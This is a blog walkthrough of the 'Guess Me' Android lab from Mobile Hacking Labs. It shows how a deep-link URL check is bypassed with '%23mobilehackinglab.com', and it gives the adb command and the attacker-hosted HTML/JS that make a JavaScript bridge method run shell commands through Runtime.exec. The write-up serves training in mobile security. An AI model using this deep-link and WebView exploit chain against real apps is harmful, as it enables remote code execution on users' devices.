0xk4k45h1

Active Directory
CTF
HackTheBox
- Machines
  - Cicada
  - Devvortex
  - Drive
  - Editorial
  - Intuition
  - PC
  - Visual
- Sherlock
Mobile Pentesting
- Android
Home

Contact

Copyright © 2024 | Yankos

Home > Mobile Pentesting > Android > Mobile Hacking Labs

Now Loading ...

Mobile Hacking Labs

Guess Me
Description Welcome to the “Guess Me” Deep Link Exploitation Challenge! Immerse yourself in the world of cybersecurity with this hands-on lab. This challenge revolves around a fictitious “Guess Me” app, shedding light on a critical security flaw related to deep links that can lead to remote code execution within the app’s framework. Solution In this lab we have 2 activities: Main Activity : and it contains the logic of the game which needs you to guess a number for winning WebviewActivity : which is the interesting part in this challenge as it handles a deep link <activity android:name="com.mobilehackinglab.guessme.WebviewActivity" android:exported="true"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:scheme="mhl" android:host="mobilehackinglab"/> </intent-filter> </activity> contains webview which we can control what it loads with some constraints The web view has interesting settings like JS enable webSettings.setJavaScriptEnabled(**true**); so JS code can be executed in the webview. JavaScriptInterface webView3.addJavascriptInterface(**new** MyJavaScriptInterface(), "AndroidBridge"); so If we can run JS code, we will be able to call methods annotated by @JavascriptInterface which are: loadWebsite(String url) getTime(String Time) Handling DeepLink logic We see that we can accept intent in which the DeepLink gets handled public void onNewIntent(Intent intent) { super.onNewIntent(intent); handleDeepLink(intent); } private final void handleDeepLink(Intent intent) { Uri uri = intent != null ? intent.getData() : null; if (uri != null) { if (isValidDeepLink(uri)) { loadDeepLink(uri); } else { loadAssetIndex(); } } } There are some constraints we need to know in order to handle the deep link and understand it to find how to exploit it. The scheme must be mhl or https and the host must be mobilehackinglab as we see here private final boolean isValidDeepLink(Uri uri) { if ((!Intrinsics.areEqual(uri.getScheme(), "mhl") && !Intrinsics.areEqual(uri.getScheme(), "https")) || !Intrinsics.areEqual(uri.getHost(), "mobilehackinglab")) { return false; } It accepts a query parameter url and this url can be loaded but it must end with mobilehackinglab.com String queryParameter = uri.getQueryParameter("url"); return queryParameter != null && StringsKt.endsWith$default(queryParameter, "mobilehackinglab.com", false, 2, (Object) null); The 2 above condition are in isValidDeepLink(uri) method. and in loadDeepLink(uri) the url in query parameter gets loaded if it passed the tests in isValidDeepLink(uri) method. So in order to load a url you provide the following conditions must be satisfies: the deeplink url scheme = mhl or https the deeplink url hostname = mobilehackinglab url query parameter exists and its value ends with mobilehackinglab.com and then this url will be loaded. (This condition is the one we will bypass to load a url we want). Crafting the payload After thinking we have a way to bypass this and load a url controlled by us using. url=%23mobilehackinglab.com %23 = # and it will follow the condition and load our site url=?test=mobilehackinglab.com test parameter doesn’t exist which will follow the condition and load our site also so the full powershell payload became .\adb.exe shell am start-activity -n com.mobilehackinglab.guessme/com.mobilehackinglab.guessme.WebviewActivity -d https://mobilehackinglab/?url=https://google.com%23mobilehackinglab.com and it loads google.com now we want to get RCE and this can be done if we read the javascript interface methods well. we have public final String getTime(String Time) { Intrinsics.checkNotNullParameter(Time, "Time"); try { Process process = Runtime.getRuntime().exec(Time); InputStream inputStream = process.getInputStream(); Intrinsics.checkNotNullExpressionValue(inputStream, "getInputStream(...)"); Reader inputStreamReader = new InputStreamReader(inputStream, Charsets.UTF_8); BufferedReader reader = inputStreamReader instanceof BufferedReader ? (BufferedReader) inputStreamReader : new BufferedReader(inputStreamReader, 8192); String readText = TextStreamsKt.readText(reader); reader.close(); return readText; } catch (Exception e) { return "Error getting time"; } } We see that the parameter we pass to the function gets executed using exec function, and we can call this method and control that parameter, so we can change the parameter to any command we want. I used the same html page made by the challenge and made the command to be id <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Android.showFlag</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } #result { margin-top: 20px; padding: 10px; border: 1px solid #ddd; background-color: #f9f9f9; } </style> </head> <body> <p id="result">Thank you for visiting</p>  <a href="#" onclick="loadWebsite()">Visit MobileHackingLab</a> <script> function loadWebsite() { window.location.href = "https://www.mobilehackinglab.com/"; } // Fetch and display the time when the page loads var result = AndroidBridge.getTime("id"); var lines = result.split('\n'); var timeVisited = lines[0]; var fullMessage = "Thanks for playing the game\n\n Please visit mobilehackinglab.com for more! \n\nTime of visit: " + timeVisited; document.getElementById('result').innerText = fullMessage; </script> </body> </html> Then i started a server at port 8000 and started ngrok using ngrok http 8000 i got this url https://91e2-156-199-159-107.ngrok-free.app which will forward the visitor to the html page i created and hosted. So we can force the app to visit this html page and then it will execute the id command because of the line var result = AndroidBridge.getTime("id"); and show the result. Our final payload became ⇒ .\adb.exe shell am start-activity -n com.mobilehackinglab.guessme/com.mobilehackinglab.guessme.WebviewActivity -d https://mobilehackinglab/?url=https://91e2-156-199-159-107.ngrok-free.app%23mobilehackinglab.com and … GG !! we got the RCE.
Mobile Pentesting · 2025-02-17

Touch background to close